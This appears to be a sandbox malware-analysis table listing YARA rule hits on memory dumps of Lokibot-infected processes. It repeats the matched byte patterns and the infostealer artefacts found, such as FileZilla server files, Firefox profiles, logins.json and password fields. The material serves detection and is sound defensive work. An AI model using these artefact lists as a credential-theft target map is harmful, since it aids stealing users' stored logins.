00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000020.00000002.2354868901.0000000003B60000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0000000F.00000002.2200454632.00000000014D0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
00000004.00000002.2140487819.0000000002901000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0000000E.00000002.2192766303.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000018.00000002.2282308758.0000000003A80000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000015.00000002.2256736978.0000000003B50000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000014.00000002.2246884457.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000019.00000002.2290291971.00000000011B0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0000001B.00000002.2308475727.0000000003A70000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000002.00000002.2033735922.00000000037A0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0000001F.00000002.2345893899.0000000001A60000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0000001C.00000002.2317257822.00000000031E0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
00000004.00000002.2153883300.0000000003E1D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000010.00000002.2209784017.0000000001570000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000024.00000002.2395334086.0000000002010000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001E.00000002.2337513534.00000000038B0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
